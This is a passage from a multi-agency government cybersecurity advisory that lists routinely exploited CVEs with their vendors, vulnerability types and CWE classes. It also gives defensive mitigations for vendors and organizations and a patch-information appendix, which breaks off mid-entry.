\n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472> \"CVE-2020-1472\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\nPrivilege Escalation\n\n| \n\n[CWE-330: Use of Insufficiently Random Values](<https://cwe.mitre.org/data/definitions/330.html> \"CWE-330: Use of Insufficiently Random Values\" ) \n \n[CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882> \"CVE-2020-14882\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server\n\n| \n\nRCE\n\n| \n\nNone Listed \n \n[CVE-2020-14883](<https://nvd.nist.gov/vuln/detail/CVE-2020-14883> \"CVE-2020-14883\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server\n\n| \n\nRCE\n\n| \n\nNone Listed \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016> \"CVE-2021-20016\" )\n\n| \n\nSonicWALL\n\n| \n\nSSLVPN SMA100\n\n| \n\nSQL Injection\n\n| \n\n[CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')](<https://cwe.mitre.org/data/definitions/89.html> \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command \\('SQL Injection'\\)\" ) \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855> \"CVE-2021-26855\" )\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-918: Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html> \"CWE-918: Server-Side Request Forgery \\(SSRF\\)\" ) \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065> \"CVE-2021-27065\" )\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858> \"CVE-2021-26858\" )\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\nNone Listed \n 
\n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857> \"CVE-2021-26857\" )\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-502: Deserialization of Untrusted Data](<https://cwe.mitre.org/data/definitions/502.html> \"CWE-502: Deserialization of Untrusted Data\" ) \n \n[CVE-2021-20021](<https://nvd.nist.gov/vuln/detail/CVE-2021-20021> \"CVE-2021-20021\" )\n\n| \n\nSonicWALL\n\n| \n\nEmail Security\n\n| \n\nPrivilege Escalation Exploit Chain\n\n| \n\n[CWE-269: Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html> \"CWE-269: Improper Privilege Management\" ) \n \n[CVE-2021-40438](<https://nvd.nist.gov/vuln/detail/CVE-2021-40438> \"CVE-2021-40438\" )\n\n| \n\nApache\n\n| \n\nHTTP Server\n\n| \n\nServer-Side Request Forgery\n\n| \n\n[CWE-918: Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html> \"CWE-918: Server-Side Request Forgery \\(SSRF\\)\" ) \n \n[CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \"CVE-2021-41773\" )\n\n| \n\nApache\n\n| \n\nHTTP Server\n\n| \n\nServer Path Traversal\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"\u00a0CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013> \"CVE-2021-42013\" )\n\n| \n\nApache\n\n| \n\nHTTP Server\n\n| \n\nServer Path Traversal\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038> \"CVE-2021-20038\" )\n\n| \n\nSonicWall\n\n| \n\nSMA 100 Series Appliances\n\n| \n\nStack-based Buffer Overflow\n\n| \n\n[CWE-787: Out-of-bounds 
Write](<https://cwe.mitre.org/data/definitions/787.html> \"CWE-787: Out-of-bounds Write\" )\n\n[CWE-121: Stack-based Buffer Overflow](<http://cwe.mitre.org/data/definitions/121.html> \"CWE-121: Stack-based Buffer Overflow\" ) \n \n[CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046> \"CVE-2021-45046\" )\n\n| \n\nApache\n\n| \n\nLog4j\n\n| \n\nRCE\n\n| \n\n[CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html> \"CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement \\('Expression Language Injection'\\)\" ) \n \n[CVE-2022-42475](<https://nvd.nist.gov/vuln/detail/CVE-2022-42475> \"CVE-2022-42475\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS\n\n| \n\nHeap-based Buffer Overflow\n\n| \n\n[CWE-787: Out-of-bounds Write](<https://cwe.mitre.org/data/definitions/787.html> \"CWE-787: Out-of-bounds Write\" ) \n \n[CVE-2022-24682](<https://nvd.nist.gov/vuln/detail/CVE-2022-24682> \"CVE-2022-24682\" )\n\n| \n\nZimbra\n\n| \n\nCollaboration Suite\n\n| \n\n\u2018Cross-site Scripting\u2019\n\n| \n\n[CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')](<https://cwe.mitre.org/data/definitions/79.html> \"CWE-79: Improper Neutralization of Input During Web Page Generation \\('Cross-site Scripting'\\)\" ) \n \n[CVE-2022-22536](<https://nvd.nist.gov/vuln/detail/CVE-2022-22536> \"CVE-2022-22536\" )\n\n| \n\nSAP\n\n| \n\nInternet Communication Manager (ICM)\n\n| \n\nHTTP Request Smuggling\n\n| \n\n[CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')](<https://cwe.mitre.org/data/definitions/444.html> \"CWE-444: Inconsistent Interpretation of HTTP Requests \\('HTTP Request/Response Smuggling'\\)\" ) \n \n[CVE-2022-22963](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963> \"CVE-2022-22963\" )\n\n| \n\nVMware Tanzu\n\n| \n\nSpring Cloud\n\n| 
\n\nRCE\n\n| \n\n[CWE-94: Improper Control of Generation of Code ('Code Injection')](<https://cwe.mitre.org/data/definitions/94.html> \"CWE-94: Improper Control of Generation of Code \\('Code Injection'\\)\" )\n\n[CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html> \"CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement \\('Expression Language Injection'\\)\" ) \n \n[CVE-2022-29464](<https://nvd.nist.gov/vuln/detail/CVE-2022-29464> \"CVE-2022-29464\" )\n\n| \n\nWSO2\n\n| \n\nMultiple Products\n\n| \n\nRCE\n\n| \n\n[CWE-434: Unrestricted Upload of File with Dangerous Type](<https://cwe.mitre.org/data/definitions/434.html> \"CWE-434: Unrestricted Upload of File with Dangerous Type\" ) \n \n[CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924> \"CVE-2022-27924\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite\n\n| \n\nCommand Injection\n\n| \n\n[CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html> \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component \\('Injection'\\)\" ) \n \n[CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047> \"CVE-2022-22047\" )\n\n| \n\nMicrosoft\n\n| \n\nWindows CSRSS\n\n| \n\nElevation of Privilege\n\n| \n\n[CWE-269: Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html> \"CWE-269: Improper Privilege Management\" ) \n \n[CVE-2022-27593](<https://nvd.nist.gov/vuln/detail/CVE-2022-27593> \"CVE-2022-27593\" )\n\n| \n\nQNAP\n\n| \n\nQNAP NAS\n\n| \n\nExternally Controlled Reference\n\n| \n\n[CWE-610: Externally Controlled Reference to a Resource in Another Sphere](<https://cwe.mitre.org/data/definitions/610.html> \"CWE-610: Externally Controlled Reference to a Resource in Another 
Sphere\" ) \n \n[CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082> \"CVE-2022-41082\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nPrivilege Escalation\n\n| \n\nNone Listed \n \n[CVE-2022-40684](<https://nvd.nist.gov/vuln/detail/CVE-2022-40684> \"CVE-2022-40684\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS, FortiProxy, FortiSwitchManager\n\n| \n\nAuthentication Bypass\n\n| \n\n[CWE-306: Missing Authentication for Critical Function](<https://cwe.mitre.org/data/definitions/306.html> \"CWE-306: Missing Authentication for Critical Function\" ) \n \n### **MITIGATIONS**\n\n#### **Vendors and Developers**\n\nThe authoring agencies recommend vendors and developers take the following steps to ensure their products are secure by design and default:\n\n * **Identify repeatedly exploited classes of vulnerability.** Perform an analysis of both CVEs and known exploited vulnerabilities to understand which classes of vulnerability are identified more than others. Implement appropriate mitigations to eliminate those classes of vulnerability. For example, if a product has several instances of SQL injection vulnerabilities, ensure all database queries in the product use parameterized queries, and prohibit other forms of queries.\n * **Ensure business leaders are responsible for security.** Business leaders should ensure that proactive steps are taken to eliminate entire classes of security vulnerabilities, rather than only making one-off patches when new vulnerabilities are discovered.\n * **Follow the SSDF** ([SP 800-218](<https://csrc.nist.gov/publications/detail/sp/800-218/final> \"NIST SP 800-218\" )) and implement secure design practices into each stage of the SDLC. 
Pay attention to: \n * Prioritizing the use of memory-safe languages wherever possible [[SSDF PW.6.1](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Exercising due diligence when selecting software components (e.g., software libraries, modules, middleware, frameworks) to ensure robust security in consumer software products [[SSDF PW.4.1](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Setting up secure development team practices; this includes conducting peer code reviews, working to a common organization secure coding standard, and maintaining awareness of language-specific security concerns [[SSDF PW.5.1, PW.7.1, PW.7.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Establishing a [vulnerability disclosure program](<https://www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/vulnerability-disclosure-programs-explained> \"Vulnerability Disclosure Programs Explained\" ) to verify and resolve security vulnerabilities disclosed by people who may be internal or external to the organization [[SSDF RV.1.3](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )]. 
As part of this, establish processes to determine root causes of discovered vulnerabilities.\n * Using static and dynamic application security testing (SAST/DAST) tools to analyze product source code and application behavior to detect error-prone practices [[SSDF PW.7.2, PW.8.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Configuring production-ready products to have the most secure settings as default and providing guidance on the risks of changing each setting [[SSDF PW.9.1, PW.9.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * **Prioritize secure-by-default configurations** such as eliminating default passwords, implementing single sign-on (SSO) technology via modern open standards, and providing high-quality audit logs to customers with no additional configuration and at no extra charge.\n * **Ensure published CVEs include the proper CWE field identifying the root cause of the vulnerability** to enable industry-wide analysis of software security and design flaws.\n\nFor more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see joint guide [Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default](<https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default> \"Security-by-Design and -Default\" ).\n\n#### **End-User Organizations**\n\nThe authoring agencies recommend end-user organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors\u2019 activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). 
The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA\u2019s [Cross-Sector Cybersecurity Performance Goals](<https://www.cisa.gov/cross-sector-cybersecurity-performance-goals> \"Cross-Sector Cybersecurity Performance Goals\" ) for more information on CPGs, including additional recommended baseline protections.\n\n#### **_Vulnerability and Configuration Management_**\n\n * **Update software, operating systems, applications, and firmware on IT network assets in a timely manner** [CPG 1.E]. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog> \"Known Exploited Vulnerabilities Catalog\" ), especially those CVEs identified in this CSA, then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix. \n * If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.\n * Replace end-of-life software (i.e., software no longer supported by the vendor).\n * **Routinely perform automated asset discovery** across the entire estate to identify and catalogue all the systems, services, hardware, and software.\n * **Implement a robust patch management process** and centralized patch management system that establishes prioritization of patch applications [CPG 1.A]. \n * Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). 
Reputable MSPs can patch applications\u2014such as webmail, file storage, file sharing, and chat and other employee collaboration tools\u2014for their customers. However, MSPs and CSPs can expand their customer\u2019s attack surface and may introduce unanticipated risks, so organizations should proactively collaborate with their MSPs and CSPs to jointly reduce risk [CPG 1.F]. For more information and guidance, see the following resources. \n * CISA Insights Risk Considerations for Managed Service Provider Customers\n * CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses\n * ACSC advice on [How to Manage Your Security When Engaging a Managed Service Provider](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/managed-services/how-manage-your-security-when-engaging-managed-service-provider> \"How to Manage Your Security When Engaging a Managed Service Provider\" )\n * **Document secure baseline configurations for all IT/OT components**, including cloud infrastructure. Monitor, examine, and document any deviations from the initial secure baseline [CPG 2.O].\n * **Perform regular secure system backups** and create known good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R].\n * **Maintain an updated cybersecurity incident response plan** that is tested at least annually and updated within a risk informed time frame to ensure its effectiveness [CPG 2.S].\n\n#### **_Identity and Access Management_**\n\n * **Enforce phishing-resistant multifactor authentication (MFA) for all users**, without exception. [CPG 2.H].\n * **Enforce MFA on all VPN connections**. 
If MFA is unavailable, require employees engaging in remote work to use strong passwords [CPG 2.A, 2.B, 2.C, 2.D, 2.G].\n * **Regularly review, validate, or remove privileged accounts** (annually at a minimum) [CPG 2.D, 2.E].\n * **Configure access control under the principle of least privilege** [CPG 2.Q]. \n * Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (using non-administrative privileges where feasible). \n**Note:** See CISA\u2019s Capacity Enhancement Guide \u2013 Implementing Strong Authentication and ACSC\u2019s guidance on [Implementing Multi-Factor Authentication](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/implementing-multi-factor-authentication> \"Implementing Multi-Factor Authentication\" ) for more information on authentication system hardening.\n\n#### **_Protective Controls and Architecture_**\n\n * **Properly configure and secure internet-facing network devices**, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices [CPG 2.V, 2.W, 2.X]. \n * Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.\n * Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.\n * Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).\n * **Implement Zero Trust Network Architecture (ZTNA)** to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks [CPG 2.F, 2.X]. 
**Note:** See the Department of Defense\u2019s [Zero Trust Reference Architecture](<https://dodcio.defense.gov/Portals/0/Documents/Library/\\(U\\)ZT_RA_v2.0\\(U\\)_Sep22.pdf> \"Department of Defense \\(DoD\\) Zero Trust Reference Architecture\" ) for additional information on Zero Trust.\n * **Continuously monitor the attack surface** and investigate abnormal activity that may indicate cyber actor or malware lateral movement [CPG 2.T]. \n * Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure EDR, SIEM, vulnerability scanner, and other similar tools are reporting the same number of assets [CPG 2.T, 2.V].\n * Use web application firewalls to monitor and filter web traffic. These tools are commercially available via hardware, software, and cloud-based solutions, and may detect and mitigate exploitation attempts where a cyber actor sends a malicious web request to an unpatched device [CPG 2.B, 2.F].\n * Implement an administrative policy and/or automated process configured to monitor unwanted hardware, software, or programs against an allowlist with specified approved versions [CPG 2.Q].\n * Use a network protocol analyzer to examine captured data, including packet-level data.\n\n#### **_Supply Chain Security_**\n\n * **Reduce third-party applications and unique system/application builds**\u2014provide exceptions only if required to support business critical functions [CPG 2.Q].\n * Ensure contracts require vendors and/or third-party service providers to: \n * Provide notification of security incidents and vulnerabilities within a risk informed time frame [CPG 1.G, 1.H, 1.I].\n * Supply a Software Bill of Materials (SBOM) with all products to enhance vulnerability monitoring and to help reduce time to respond to identified vulnerabilities [CPG 4.B].\n * **Ask your software providers to discuss their secure by 
design program** and to provide links to information about how they are working to remove classes of vulnerabilities, and to set secure default settings.\n\n### **RESOURCES**\n\n * For information on the top vulnerabilities routinely exploited in 2016 through 2019, 2020, and 2021, see: \n * Joint CSA [Top 10 Routinely Exploited Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a> \"Top 10 Routinely Exploited Vulnerabilities\" )\n * Joint CSA [Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a> \"Top Routinely Exploited Vulnerabilities\" )\n * Joint CSA [2021 Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a> \"2021 Top Routinely Exploited Vulnerabilities\" )\n * See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA.\n * See ACSC\u2019s [Essential Eight mitigation strategies](<https://www.cyber.gov.au/resources-business-and-government/essential-cyber-security/essential-eight/essential-eight-maturity-model> \"Essential Eight Maturity Model\" ) for additional mitigations.\n * See ACSC\u2019s [Cyber Supply Chain Risk Management](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/cyber-supply-chains/cyber-supply-chain-risk-management> \"Cyber Supply Chain Risk Management\" ) for additional considerations and advice.\n\n### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. 
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### **PURPOSE**\n\nThis document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.\n\n### **REFERENCES**\n\n[1] [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance> \"Apache Log4j Vulnerability Guidance\" )\n\n### **VERSION HISTORY**\n\nAugust 3, 2023: Initial version.\n\n### **APPENDIX: PATCH INFORMATION AND ADDITIONAL RESOURCES FOR TOP EXPLOITED VULNERABILITIES**\n\n**CVE**\n\n| \n\n**Vendor**\n\n| \n\n**Affected Products and Versions**\n\n| \n\n**Patch Information**\n\n| \n\n**Resources** \n \n---|---|---|---|--- \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199> \"CVE-2017-0199\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199> \"Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows\" )\n\n| \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \"CVE-2017-11882\" )\n\n| \n\nMicrosoft\n\n| \n\nOffice, Multiple Versions\n\n| \n\n[Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882> \"Microsoft Office Memory Corruption Vulnerability\" )\n\n| \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379> \"CVE-2018-13379\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6\n\n| \n\n[FortiProxy - system file leak through SSL VPN special 
crafted HTTP resource requests](<https://www.fortiguard.com/psirt/FG-IR-20-233> \"FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests\" )\n\n| \n\nJoint CSAs:\n\n[Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a> \"Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities\" )\n\n[Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a> \"Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology\" )\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" ) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510> \"CVE-2019-11510\" )\n\n| \n\nIvanti\n\n| \n\nPulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12\n\n| \n\n[SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://forums.ivanti.com/s/article/SA44101?language=en_US> \"SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX\" )\n\n| \n\nCISA Alerts:\n\n[Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a> \"Continued Exploitation of Pulse Secure VPN Vulnerability\" )\n\n[Chinese Ministry of 
State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a> \"Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity\" )\n\nACSC Advisory:\n\n[2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software](<https://www.cyber.gov.au/about-us/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software> \"2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software\" )\n\nJoint CSA:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n_CCCS Alert:_\n\n[APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi> \"Alert - APT Actors Target U.S. 
and Allied Networks - update 1\" ) \n \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708> \"CVE-2019-0708\" )\n\n| \n\nMicrosoft\n\n| \n\nRemote Desktop Services\n\n| \n\n[Remote Desktop Services Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0708> \"Remote Desktop Services Remote Code Execution Vulnerability\" )\n\n| \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781> \"CVE-2019-19781\" )\n\n| \n\nCitrix\n\n| \n\nADC and Gateway version 13.0 all supported builds before 13.0.47.24\n\nNetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12\n\nSD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b\n\n| \n\n[CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance](<https://support.citrix.com/article/CTX267027/cve201919781-vulnerability-in-citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance> \"CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance\" )\n\n| \n\nJoint CSAs:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n[Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a> \"Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity\" )\n\n_CCCS Alert:_\n\n[Detecting Compromises relating to Citrix 
CVE-2019-19781](<https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0> \"Alert - Detecting Compromises relating to Citrix CVE-2019-19781\" ) \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902> \"CVE-2020-5902\" )\n\n| \n\nF5\n\n| \n\nBIG IP versions 15.1.0, 15.0.0 to 15.0.1, 14.1.0 to 14.1.2, 13.1.0 to 13.1.3, 12.1.0 to 12.1.5, and 11.6.1 to 11.6.5\n\n| \n\n[K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://my.f5.com/manage/s/article/K52145254> \"K52145254: TMUI RCE vulnerability CVE-2020-5902\" )\n\n| \n\nCISA Alert:\n\n[Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-206a> \"Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902\" ) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472> \"CVE-2020-1472\" )\n\n| \n\nMicrosoft\n\n| \n\nWindows Server, Multiple Versions\n\n| \n\n[Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472> \"Netlogon Elevation of Privilege Vulnerability\" )\n\n| \n\nACSC Advisory:\n\n[2020-016: Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/about-us/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472> \"Advisory 2020-016: \\\"Zerologon\\\" - Netlogon Elevation of Privilege Vulnerability \\(CVE-2020-1472\\)\" )\n\nJoint CSA:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n_CCCS Alert:_\n\n[Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 
